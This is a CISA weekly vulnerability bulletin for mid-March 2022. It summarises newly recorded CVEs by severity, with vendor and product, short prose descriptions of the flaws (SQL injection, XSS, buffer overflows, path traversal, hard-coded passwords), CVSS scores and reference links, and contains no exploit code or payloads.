US-CERT Bulletin (SB22-080):Vulnerability Summary for the Week of March 14, 2022

Bulletins provide weekly summaries of new vulnerabilities. Patch information is provided when available.

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. NVD is sponsored by CISA. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High: vulnerabilities with a CVSS base score of 7.0–10.0
  • Medium: vulnerabilities with a CVSS base score of 4.0–6.9
  • Low: vulnerabilities with a CVSS base score of 0.0–3.9

Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis.

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
10web — photo_gallery The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection 2022-03-14 7.5 CVE-2022-0169
MISC
CONFIRM
adobe — illustrator Adobe Illustrator version 26.0.3 (and earlier) is affected by a buffer overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file in Illustrator. 2022-03-11 9.3 CVE-2022-23187
MISC
apache — http_server Out-of-bounds Write vulnerability in mod_sed of Apache HTTP Server allows an attacker to overwrite heap memory with possibly attacker provided data. This issue affects Apache HTTP Server 2.4 version 2.4.52 and prior versions. 2022-03-14 7.5 CVE-2022-23943
MISC
MLIST
apache — http_server Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling 2022-03-14 7.5 CVE-2022-22720
MISC
MLIST
bluproducts — g90_firmware An issue was discovered in Luna Simo PPR1.180610.011/202001031830. A pre-installed app with a package name of com.skyroam.silverhelper writes three IMEI values to system properties at system startup. The system property values can be obtained via getprop by all third-party applications co-located on the device, even those with no permissions granted, exposing the IMEI values to processes without enforcing any access control. 2022-03-11 7.2 CVE-2021-41850
MISC
MISC
MISC
MISC
dell — alienware_13_r3_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. 2022-03-11 7.2 CVE-2022-24420
MISC
dell — alienware_13_r3_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. 2022-03-11 7.2 CVE-2022-24419
MISC
dell — alienware_13_r3_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. 2022-03-11 7.2 CVE-2022-24416
MISC
dell — alienware_13_r3_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. 2022-03-11 7.2 CVE-2022-24415
MISC
dell — alienware_13_r3_firmware Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. 2022-03-11 7.2 CVE-2022-24421
MISC
lg — webos The public API error causes for the attacker to be able to bypass API access control. 2022-03-11 7.5 CVE-2022-23730
MISC
molie_instructure_canvas_linking_tool_project — molie_instructure_canvas_linking_tool The MOLIE WordPress plugin through 0.5 does not validate and escape a post parameter before using in a SQL statement, leading to an SQL Injection 2022-03-14 7.5 CVE-2021-25007
MISC
nystudio107 — seomatic A Server-side Template Injection (SSTI) vulnerability exists in Nystudio107 Seomatic 3.4.12 in src/helpers/UrlHelper.php via the host header. 2022-03-11 7.5 CVE-2021-44618
MISC
MISC
parseplatform — parse-server Parse Server is an open source http web server backend. In versions prior to 4.10.7 there is a Remote Code Execution (RCE) vulnerability in Parse Server. This vulnerability affects Parse Server in the default configuration with MongoDB. The main weakness that leads to RCE is the Prototype Pollution vulnerable code in the file `DatabaseController.js`, so it is likely to affect Postgres and any other database backend as well. This vulnerability has been confirmed on Linux (Ubuntu) and Windows. Users are advised to upgrade as soon as possible. The only known workaround is to manually patch your installation with code referenced at the source GHSA-p6h4-93qp-jhcm. 2022-03-12 7.5 CVE-2022-24760
CONFIRM
MISC
ponton — x\/p_messenger An issue was discovered in PONTON X/P Messenger before 3.11.2. Due to path traversal in private/SchemaSetUpload.do for uploaded ZIP files, an executable script can be uploaded by web application administrators, giving the attacker remote code execution on the underlying server via an imgs/*.jsp URI. 2022-03-13 7.5 CVE-2021-45887
MISC
MISC
simple-git_project — simple-git The package simple-git before 3.3.0 are vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn) function, both the remote and branch parameters are passed to the git fetch subcommand. By injecting some git options it was possible to get arbitrary command execution. 2022-03-11 7.5 CVE-2022-24433
MISC
MISC
MISC
MISC
totolink — a3100r_firmware A Command Injection vulnerability exits in TOTOLINK A3100R <=V4.1.2cu.5050_B20200504 in adm/ntm.asp via the hosTime parameters. 2022-03-11 7.5 CVE-2021-44620
MISC
MISC
MISC
MISC
tribalsystems — zenario Zenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth. 2022-03-14 7.5 CVE-2021-42171
MISC
wptaskforce — wpcargo_track_\&_trace The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE 2022-03-14 7.5 CVE-2021-25003
MISC
yokogawa — centum_vp_firmware The following Yokogawa Electric products hard-code the password for CAMS server applications: CENTUM VP versions from R5.01.00 to R5.04.20 and versions from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00 2022-03-11 7.5 CVE-2022-23402
CONFIRM
Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
abb — ellipse_enterprise_asset_management An attacker could trick a user of Hitachi ABB Power Grids Ellipse Enterprise Asset Management (EAM) versions prior to and including 9.0.25 into visiting a malicious website posing as a login page for the Ellipse application and gather authentication credentials. 2022-03-11 4.3 CVE-2021-27414
CONFIRM
CONFIRM
abb — ellipse_enterprise_asset_management An attacker could exploit this vulnerability in Hitachi ABB Power Grids Ellipse Enterprise Asset Management (EAM) versions prior to and including 9.0.25 by tricking a user to click on a link containing malicious code that would then be run by the web browser. This can result in the compromise of confidential information, or even the takeover of the user’s session. 2022-03-11 5.8 CVE-2021-27416
CONFIRM
CONFIRM
alibaba — nacos A Cross Site Scripting (XSS) vulnerability exists in Nacos 2.0.3 in auth/users via the (1) pageSize and (2) pageNo parameters. 2022-03-11 4.3 CVE-2021-44667
MISC
alist_project — alist Alist v2.1.0 and below was discovered to contain a cross-site scripting (XSS) vulnerability via /i/:data/ipa.plist. 2022-03-12 4.3 CVE-2022-26533
MISC
apache — http_server A carefully crafted request body can cause a read to a random memory area which could cause the process to crash. This issue affects Apache HTTP Server 2.4.52 and earlier. 2022-03-14 5 CVE-2022-22719
MISC
MLIST
apache — http_server If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier. 2022-03-14 6.8 CVE-2022-22721
MISC
MLIST
atlassian — crucible The DefaultRepositoryAdminService class in Fisheye and Crucible before version 4.8.9 allowed remote attackers, who have ‘can add repository permission’, to enumerate the existence of internal network and filesystem resources via a Server-Side Request Forgery (SSRF) vulnerability. 2022-03-14 4 CVE-2021-43954
MISC
MISC
bestwebsoft — error_log_viewer The Error Log Viewer WordPress plugin through 1.1.1 does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder 2022-03-14 4 CVE-2021-24966
MISC
bwp-google-xml-sitemaps_project — bwp-google-xml-sitemaps The Better WordPress Google XML Sitemaps WordPress plugin through 1.4.1 does not sanitise and escape its logs when outputting them in the admin dashboard, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks against admins 2022-03-14 4.3 CVE-2022-0230
MISC
contact-form-submission_project — contact-form-submission The Contact Form Submissions WordPress plugin before 1.7.3 does not sanitise and escape additional fields in contact form requests before outputting them in the related submission. As a result, unauthenticated attacker could perform Cross-Site Scripting attacks against admins viewing the malicious submission 2022-03-14 4.3 CVE-2022-0248
MISC
CONFIRM
cookieinformation — wp-gdpr-compliance The Cookie Information | Free GDPR Consent Solution WordPress plugin before 2.0.8 does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue 2022-03-14 4.3 CVE-2022-0147
MISC
CONFIRM
fasterxml — jackson-databind jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. 2022-03-11 5 CVE-2020-36518
MISC
gpac — gpac GPAC 1.0.1 is affected by a NULL pointer dereference in gf_dump_vrml_field.isra (). 2022-03-14 4.3 CVE-2022-24574
MISC
gpac — gpac GPAC 2.0 allows a heap-based buffer overflow in gf_base64_encode. It can be triggered via MP4Box. 2022-03-12 6.8 CVE-2022-26967
MISC
gpac — gpac GPAC 1.0.1 is affected by a stack-based buffer overflow through MP4Box. 2022-03-14 6.8 CVE-2022-24575
MISC
MISC
gpac — gpac GPAC 1.0.1 is affected by Use After Free through MP4Box. 2022-03-14 4.3 CVE-2022-24576
MISC
MISC
huawei — atune atune before 0.3-0.8 log in as a local user and run the curl command to access the local atune url interface to escalate the local privilege or modify any file. Authentication is not forcibly enabled in the default configuration. 2022-03-11 4.6 CVE-2021-33658
CONFIRM
intel — atom_c2308 Hardware allows activation of test or debug logic at runtime for some Intel(R) Trace Hub instances which may allow an unauthenticated user to potentially enable escalation of privilege via physical access. 2022-03-11 4.6 CVE-2021-33150
MISC
king-theme — kingcomposer The Page Builder KingComposer WordPress plugin through 2.9.6 does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users 2022-03-14 6.8 CVE-2022-0165
MISC
lg — webos V8 javascript engine (heap vulnerability) can cause privilege escalation ,which can impact on some webOS TV models. 2022-03-11 4.6 CVE-2022-23731
MISC
liblouis — liblouis Liblouis through 3.21.0 has a buffer overflow in compilePassOpcode in compileTranslationTable.c (called, indirectly, by tools/lou_checktable.c). 2022-03-13 6.8 CVE-2022-26981
MISC
libtiff — libtiff Out-of-bounds Read error in tiffcp in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 408976c4. 2022-03-11 4.3 CVE-2022-0924
MISC
CONFIRM
MISC
libtiff — libtiff Null source pointer passed as an argument to memcpy() function within TIFFFetchNormalTag () in tif_dirread.c in libtiff versions up to 4.3.0 could lead to Denial of Service via crafted TIFF file. 2022-03-11 4.3 CVE-2022-0908
CONFIRM
MISC
MISC
libtiff — libtiff Unchecked Return Value to NULL Pointer Dereference in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f2b656e2. 2022-03-11 4.3 CVE-2022-0907
MISC
CONFIRM
MISC
libtiff — libtiff Divide By Zero error in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f8d0f9aa. 2022-03-11 4.3 CVE-2022-0909
MISC
MISC
CONFIRM
lua — lua Use after free in garbage collector and finalizer of lgc.c in Lua interpreter 5.4.0~5.4.3 allows attackers to perform Sandbox Escape via a crafted script file. 2022-03-14 4.3 CVE-2021-44964
MISC
MISC
MISC
MISC
MISC
microweber — microweber Abusing Backup/Restore feature to achieve Remote Code Execution in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-11 6.5 CVE-2022-0921
MISC
CONFIRM
microweber — microweber Integer Overflow or Wraparound in GitHub repository microweber/microweber prior to 1.3. 2022-03-11 5 CVE-2022-0913
CONFIRM
MISC
microweber — microweber XSS on dynamic_text module in GitHub repository microweber/microweber prior to 1.2.11. 2022-03-12 4.3 CVE-2022-0929
MISC
CONFIRM
mirametrix — glance Mirametrix Glance before 5.1.1.42207 (released on 2018-08-30) allows a local attacker to elevate privileges. NOTE: this is unrelated to products from the glance.com and glance.net websites. 2022-03-13 4.6 CVE-2022-24696
MISC
molie_instructure_canvas_linking_tool_project — molie_instructure_canvas_linking_tool The MOLIE WordPress plugin through 0.5 does not escape the course_id parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue 2022-03-14 4.3 CVE-2021-25006
MISC
moodle — moodle The last time a user accessed the mobile app is displayed on their profile page, but should be restricted to users with the relevant capability (site administrators by default). Moodle versions 3.10 to 3.10.3 are affected. 2022-03-11 4 CVE-2021-32477
MISC
moodle — moodle The redirect URI in the LTI authorization endpoint required extra sanitizing to prevent reflected XSS and open redirect risks. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8 and earlier unsupported versions are affected. 2022-03-11 4.3 CVE-2021-32478
MISC
moodle — moodle An SQL injection risk existed on sites with MNet enabled and configured, via an XML-RPC call from the connected peer host. Note that this required site administrator access or access to the keypair. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. 2022-03-11 6.5 CVE-2021-32474
MISC
moodle — moodle A denial-of-service risk was identified in the draft files area, due to it not respecting user file upload limits. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. 2022-03-11 5 CVE-2021-32476
MISC
moodle — moodle It was possible for a student to view their quiz grade before it had been released, using a quiz web service. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected 2022-03-11 5 CVE-2021-32473
MISC
onenav_project — onenav An issue in index.php of OneNav v0.9.14 allows attackers to perform directory traversal. 2022-03-12 5 CVE-2022-26276
MISC
oppo — coloros In ACE2 ColorOS11, the attacker can obtain the foreground package name through permission promotion, resulting in user information disclosure. 2022-03-11 5 CVE-2021-23246
MISC
orchardcore — orchardcore Cross-site Scripting (XSS) – Stored in GitHub repository orchardcms/orchardcore prior to 1.3.0. 2022-03-11 4.3 CVE-2022-0820
CONFIRM
MISC
orchardcore — orchardcore Improper Authorization in GitHub repository orchardcms/orchardcore prior to 1.3.0. 2022-03-11 4 CVE-2022-0821
CONFIRM
MISC
phpliteadmin — phpliteadmin phpLiteAdmin through 1.9.8.2 allows XSS via the index.php newRows parameter (aka num or number). 2022-03-13 4.3 CVE-2021-46709
MISC
ponton — x\/p_messenger An issue was discovered in PONTON X/P Messenger before 3.11.2. Anti-CSRF tokens are globally valid, making the web application vulnerable to a weakened version of CSRF, where an arbitrary token of a low-privileged user (such as operator) can be used to confirm actions of higher-privileged ones (such as xpadmin). 2022-03-13 6.8 CVE-2021-45886
MISC
MISC
redhat — descision_manager A flaw was found in JBoss-client. The vulnerability occurs due to a memory leak on the JBoss client-side, when using UserTransaction repeatedly and leads to information leakage vulnerability. 2022-03-11 5 CVE-2022-0853
MISC
MISC
saleor — saleor Improper Authorization in GitHub repository saleor/saleor prior to 3.1.2. 2022-03-11 4 CVE-2022-0932
CONFIRM
MISC
secomea — gatemanager Cross-site Scripting (XSS) vulnerability in firmware section of Secomea GateManager allows logged in user to inject javascript in browser session. This issue affects: Secomea GateManager Version 9.6.621421014 and all prior versions. 2022-03-11 4.3 CVE-2021-32009
MISC
smartertools — smartertrack Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. 2022-03-14 4.3 CVE-2022-24384
CONFIRM
CONFIRM
smartertools — smartertrack A Direct Object Access vulnerability in SmarterTools SmarterTrack leads to information disclosure This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. 2022-03-14 4 CVE-2022-24385
CONFIRM
CONFIRM
smartertools — smartertrack With administrator or admin privileges the application can be tricked into overwriting files in app_data/Config folder, e.g. the systemsettings.xml file. THis is possible in SmarterTrack v100.0.8019.14010 2022-03-14 6.5 CVE-2022-24387
CONFIRM
CONFIRM
softing — datafeed_opc_suite An issue was discovered in Softing OPC UA C++ SDK before 5.70. An invalid XML element in the type dictionary makes the OPC/UA client crash due to an out-of-memory condition. 2022-03-11 4 CVE-2021-42262
MISC
MISC
softing — datafeed_opc_suite An issue was discovered in Softing OPC UA C++ SDK before 5.70. A malformed OPC/UA message abort packet makes the client crash with a NULL pointer dereference. 2022-03-11 5 CVE-2021-42577
MISC
MISC
techspawn — wp-email-users The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks. 2022-03-14 6.5 CVE-2021-24959
MISC
timescale — timescaledb Timescale TimescaleDB 1.x and 2.x before 2.5.2 may allow privilege escalation during extension installation. The installation process uses commands such as CREATE x IF NOT EXIST that allow an unprivileged user to precreate objects. These objects will be used by the installer (which executes as Superuser), leading to privilege escalation. In order to be able to take advantage of this, an unprivileged user would need to be able to create objects in a database and then get a Superuser to install TimescaleDB into their database. (In the fixed versions, the installation aborts when it finds that an object already exists.) 2022-03-13 6 CVE-2022-24128
MISC
CONFIRM
tipsandtricks-hq — simple_download_monitor The Simple Download Monitor WordPress plugin before 3.9.5 allows users with a role as low as Contributor to download any file on the web server (such as wp-config.php) via a path traversal vector. 2022-03-14 4 CVE-2021-24692
MISC
wire — wire Wire-ios is a messaging application using the wire protocol on apple’s ios platform. In versions prior to 3.95 malformed resource identifiers may render the iOS Wire Client completely unusable by causing it to repeatedly crash on launch. These malformed resource identifiers can be generated and sent between Wire users. The root cause lies in [wireapp/wire-ios-transport](https://github.com/wireapp/wire-ios-transport), where code responsible for removing sensible tokens before logging may fail and lead to a crash (Swift exception) of the application. This causes undesirable behavior, however the (greater) Wire system is still functional. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. 2022-03-11 4 CVE-2022-23625
MISC
MISC
CONFIRM
wki — idpay_for_contact_form_7 The IDPay for Contact Form 7 WordPress plugin through 2.1.2 does not sanitise and escape the idpay_error parameter before outputting it back in the page leading to a Reflected Cross-Site Scripting 2022-03-14 4.3 CVE-2021-24996
MISC
woocommerce — persian-woocommerce The Persian Woocommerce WordPress plugin through 5.8.0 does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue 2022-03-14 4.3 CVE-2021-24940
MISC
yokogawa — centum_cs_3000_firmware ‘Root Service’ service implemented in the following Yokogawa Electric products creates some named pipe with improper ACL configuration. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 6.9 CVE-2022-22148
CONFIRM
yokogawa — centum_cs_3000_firmware CAMS for HIS Log Server contained in the following Yokogawa Electric products fails to properly neutralize log outputs: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, and Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 4.9 CVE-2022-22151
CONFIRM
yokogawa — centum_cs_3000_firmware CAMS for HIS Log Server contained in the following Yokogawa Electric products is vulnerable to uncontrolled resource consumption. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 4.9 CVE-2022-22145
CONFIRM
yokogawa — centum_cs_3000_firmware There is a path traversal vulnerability in CAMS for HIS Log Server contained in the following Yokogawa Electric products: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, andfrom R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 4.9 CVE-2022-21177
CONFIRM
yokogawa — centum_cs_3000_firmware CAMS for HIS Server contained in the following Yokogawa Electric products improperly authenticate the receiving packets. The authentication may be bypassed via some crafted packets: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, and Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 6 CVE-2022-22729
CONFIRM
yokogawa — centum_cs_3000_firmware Path traversal vulnerability exists in CAMS for HIS Server contained in the following Yokogawa Electric products: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 6 CVE-2022-21808
CONFIRM
yokogawa — centum_cs_3000_firmware ‘Long-term Data Archive Package’ service implemented in the following Yokogawa Electric products creates some named pipe with imporper ACL configuration. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 4.4 CVE-2022-22141
CONFIRM
yokogawa — centum_vp_firmware The following Yokogawa Electric products do not change the passwords of the internal Windows accounts from the initial configuration: CENTUM VP versions from R5.01.00 to R5.04.20 and versions from R6.01.00 to R6.08.0, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 6.8 CVE-2022-21194
CONFIRM
Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
amd — athlon_x4_940_firmware Some AMD CPUs may transiently execute beyond unconditional direct branches, which may potentially result in data leakage. 2022-03-11 2.1 CVE-2021-26341
MISC
MLIST
amd — athlon_x4_940_firmware LFENCE/JMP (mitigation V2-2) may not sufficiently mitigate CVE-2017-5715 on some AMD CPUs. 2022-03-11 1.9 CVE-2021-26401
MISC
MLIST
b3log — vditor Cross-site Scripting (XSS) – Stored in GitHub repository vanessa219/vditor prior to 3.8.12. 2022-03-14 3.5 CVE-2022-0341
CONFIRM
MISC
bluproducts — g90_firmware An issue was discovered in Luna Simo PPR1.180610.011/202001031830. It sends the following Personally Identifiable Information (PII) in plaintext using HTTP to servers located in China: user’s list of installed apps and device International Mobile Equipment Identity (IMEI). This PII is transmitted to log.skyroam.com.cn using HTTP, independent of whether the user uses the Simo software. 2022-03-11 2.1 CVE-2021-41849
MISC
MISC
MISC
MISC
childtheme-generator — child_theme_generator The Child Theme Generator WordPress plugin through 2.2.7 does not sanitise escape the parade parameter before outputting it back, leading to a Reflected Cross-Site Scripting in the admin dashboard 2022-03-14 3.5 CVE-2021-24982
MISC
html5_responsive_faq_project — html5_responsive_faq The HTML5 Responsive FAQ WordPress plugin through 2.8.5 does not properly sanitise and escape some of its settings, which could allow a high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed 2022-03-14 3.5 CVE-2021-24995
MISC
intel — atom_c3308 Non-transparent sharing of branch predictor within a context in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access. 2022-03-11 2.1 CVE-2022-0002
MISC
MLIST
intel — atom_p5921b Non-transparent sharing of branch predictor selectors between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access. 2022-03-11 2.1 CVE-2022-0001
MISC
MLIST
linux — linux_kernel An issue was discovered in the Linux kernel before 5.16.12. drivers/net/usb/sr9700.c allows attackers to obtain sensitive information from heap memory via crafted frame lengths from a device. 2022-03-12 2.1 CVE-2022-26966
MISC
MISC
microweber — microweber File upload filter bypass leading to stored XSS in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-12 3.5 CVE-2022-0930
MISC
CONFIRM
microweber — microweber Unrestricted Upload of File with Dangerous Type in GitHub repository microweber/microweber prior to 1.2.11. 2022-03-11 3.5 CVE-2022-0912
MISC
CONFIRM
microweber — microweber File upload filter bypass leading to stored XSS in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-12 3.5 CVE-2022-0926
MISC
CONFIRM
moodle — moodle ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. 2022-03-11 3.5 CVE-2021-32475
MISC
moodle — moodle Teachers exporting a forum in CSV format could receive a CSV of forums from all courses in some circumstances. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6 and 3.8 to 3.8.8 are affected. 2022-03-11 2.6 CVE-2021-32472
MISC
openbsd — openssh ** DISPUTED ** An issue was discovered in OpenSSH before 8.9. If a client is using public-key authentication with agent forwarding but without -oLogLevel=verbose, and an attacker has silently modified the server to support the None authentication option, then the user cannot determine whether FIDO authentication is going to confirm that the user wishes to connect to that server, or that the user wishes to allow that server to connect to a different server on the user’s behalf. NOTE: the vendor’s position is “this is not an authentication bypass, since nothing is being bypassed.” 2022-03-13 2.6 CVE-2021-36368
MISC
MISC
CONFIRM
MISC
orchardcore — orchardcore Cross-site Scripting (XSS) – Reflected in GitHub repository orchardcms/orchardcore prior to 1.3.0. 2022-03-11 3.5 CVE-2022-0822
CONFIRM
MISC
patreon — patreon_wordpress The Patreon WordPress plugin before 1.8.2 does not sanitise and escape the field “Custom Patreon Page name”, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 3.5 CVE-2021-25026
MISC
CONFIRM
ponton — x\/p_messenger An issue was discovered in PONTON X/P Messenger before 3.11.2. Several functions are vulnerable to reflected XSS, as demonstrated by private/index.jsp?partners/ShowNonLocalPartners.do?localID= or private/index.jsp or private/index.jsp?database/databaseTab.jsp or private/index.jsp?activation/activationMainTab.jsp or private/index.jsp?communication/serverTab.jsp or private/index.jsp?emailNotification/notificationTab.jsp. 2022-03-13 3.5 CVE-2021-45889
MISC
MISC
ponton — x\/p_messenger An issue was discovered in PONTON X/P Messenger before 3.11.2. The navigation tree that is shown on the left side of every page of the web application is vulnerable to XSS: it allows injection of JavaScript into its nodes. Creating such nodes is only possible for users who have the role Configuration Administrator or Administrator. 2022-03-13 3.5 CVE-2021-45888
MISC
MISC
showdoc — showdoc Cross-site Scripting (XSS) – Stored in GitHub repository star7th/showdoc prior to 2.10.2. 2022-03-12 3.5 CVE-2022-0880
MISC
CONFIRM
showdoc — showdoc Stored XSS viva cshtm file upload in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-14 3.5 CVE-2022-0946
CONFIRM
MISC
showdoc — showdoc Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-14 3.5 CVE-2022-0941
CONFIRM
MISC
showdoc — showdoc Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-14 3.5 CVE-2022-0940
MISC
CONFIRM
showdoc — showdoc Stored XSS via file upload in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-14 3.5 CVE-2022-0938
CONFIRM
MISC
showdoc — showdoc Stored xss in showdoc through file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-14 3.5 CVE-2022-0937
MISC
CONFIRM
smartertools — smartertrack Stored XSS in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. 2022-03-14 3.5 CVE-2022-24386
CONFIRM
CONFIRM
thememove — insight_core The Insight Core WordPress plugin through 1.0 does not have any authorisation and CSRF checks in the insight_customizer_options_import (available to any authenticated user), does not validate user input before passing it to unserialize(), nor sanitise and escape it before outputting it in the response. As a result, it could allow users with a role as low as Subscriber to perform PHP Object Injection, as well as Stored Cross-Site Scripting attacks 2022-03-14 3.5 CVE-2021-24950
MISC
tribalsystems — zenario Zenario CMS 9.0.54156 is vulnerable to Cross Site Scripting (XSS) via upload file to *.SVG. An attacker can send malicious files to victims and steals victim’s cookie leads to account takeover. The person viewing the image of a contact can be victim of XSS. 2022-03-14 3.5 CVE-2021-41952
MISC
viitorcloud — add_subtitle The Add Subtitle WordPress plugin through 1.1.0 does not sanitise or escape the sub-title field (available only with classic editor) when output in the page, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks 2022-03-14 3.5 CVE-2021-24897
MISC
webbigt — cybersoldier The Cybersoldier WordPress plugin before 1.7.0 does not sanitise and escape the URL settings before outputting it in an attribute, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 3.5 CVE-2021-24895
MISC
yokogawa — centum_cs_3000_firmware The following Yokogawa Electric products contain insecure DLL loading issues. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 3.7 CVE-2022-23401
CONFIRM
Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
389_directory_server — 389_directory_server
 
A vulnerability was discovered in the 389 Directory Server that allows an unauthenticated attacker with network access to the LDAP port to cause a denial of service. The denial of service is triggered by a single message sent over a TCP connection, no bind or other authentication is required. The message triggers a segmentation fault that results in slapd crashing. 2022-03-16 not yet calculated CVE-2022-0918
MISC
MISC
